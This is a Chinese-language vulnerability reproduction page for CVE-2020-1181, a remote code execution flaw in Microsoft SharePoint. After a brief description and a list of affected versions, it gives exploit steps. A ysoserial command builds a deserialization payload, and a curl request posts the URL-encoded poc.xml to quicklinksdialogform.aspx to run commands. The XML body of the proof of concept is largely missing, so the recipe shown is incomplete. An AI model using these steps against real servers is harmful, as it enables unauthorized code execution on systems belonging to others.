(CVE-2020-1181)Microsoft_SharePoint_远程代码执行漏洞

# (CVE-2020-1181)Microsoft SharePoint 远程代码执行漏洞

==============

一、漏洞简介
————

`SharePoint Portal Server`
是一套门户网站解决方案,使得企业能够便捷地开发出智能的门户网站,能够无缝连接到用户、团队和知识。因此用户能够更好地利用业务流程中的相关信息,更有效地开展工作。

当`Microsoft SharePoint Server`无法正确识别和过滤不安全的`ASP.Net Web`控件时,将会存在一处远程代码执行漏洞。成功利用此漏洞的远程攻击者(需要身份验证)通过创建特制的页面,可以在`SharePoint`应用进程池的上下文中执行任意代码。

二、漏洞影响
————

Microsoft SharePoint Enterprise Server 2016Microsoft SharePoint Foundation 2010 Service Pack 2Microsoft SharePoint Foundation 2013 Service Pack 1Microsoft SharePoint Server 2019

三、复现过程
————

ysoserial.exe -g TypeConfuseDelegate -f LosFormatter -c cale.exe

![1.png](/static/qingy/(CVE-2020-1181)Microsoft_SharePoint_远程代码执行漏洞/img/rId24.png)

替换掉poc.xml内的payload

> Poc.xml





















Deserialize

这里放payload





通过 `curl -L -v –ntlm –negotiate “https://www.0-sec.org/_layouts/15/quicklinksdialogform.aspx?Mode=Suggestion” –data “viewstate=&__SUGGESTIONSCHACHE=urlencode(poc.xml)”`

![2.png](/static/qingy/(CVE-2020-1181)Microsoft_SharePoint_远程代码执行漏洞/img/rId25.png)

触发漏洞,执行命令

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容